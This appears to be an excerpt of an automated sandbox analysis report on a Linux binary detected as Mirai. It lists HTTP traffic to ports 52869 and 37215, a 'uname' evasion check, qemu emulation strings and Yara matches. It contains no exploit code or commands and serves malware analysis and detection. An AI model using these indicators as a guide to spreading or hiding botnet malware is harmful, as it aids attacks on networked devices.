Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50284 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45612 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45624 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 59048
Source: unknown Network traffic detected: HTTP traffic on port 59060 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 59060
Source: unknown Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60078 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60078 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54010 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60082 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44976 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44352 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35318 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35322 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54010 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37108 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 37108
Source: unknown Network traffic detected: HTTP traffic on port 37110 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 37110
Source: unknown Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54010 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54738 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45504 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58168 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47226 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47268 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43218 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34880 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47226 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48016 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51472 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51476 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50284 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44352 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 51476
Source: unknown Network traffic detected: HTTP traffic on port 42706 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47392 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45504 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58168 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42746 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42706 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 42746
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 42706
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56442 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 56468 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54702 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58168 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45504 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54738 -> 52869

Malware Analysis System Evasion:

barindex
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/swOGb2sZYt (PID: 5245) Queries kernel information via 'uname': Jump to behavior
Source: swOGb2sZYt, 5245.1.00000000749c3510.000000000fd4daf3.rw-.sdmp Binary or memory string: /usr/bin/qemu-m68k
Source: swOGb2sZYt, 5245.1.00000000749c3510.000000000fd4daf3.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/swOGb2sZYtSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/swOGb2sZYt
Source: swOGb2sZYt, 5245.1.00000000450b9863.00000000e57c984c.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/m68k
Source: swOGb2sZYt, 5245.1.00000000450b9863.00000000e57c984c.rw-.sdmp Binary or memory string: V!/etc/qemu-binfmt/m68k

Stealing of Sensitive Information:

barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: swOGb2sZYt, type: SAMPLE
Source: Yara match File source: 5267.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5247.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5276.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5248.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5273.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5291.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5245.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5254.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: swOGb2sZYt, type: SAMPLE
Source: Yara match File source: 5267.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5247.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5276.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5248.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5273.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5291.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5245.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5254.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs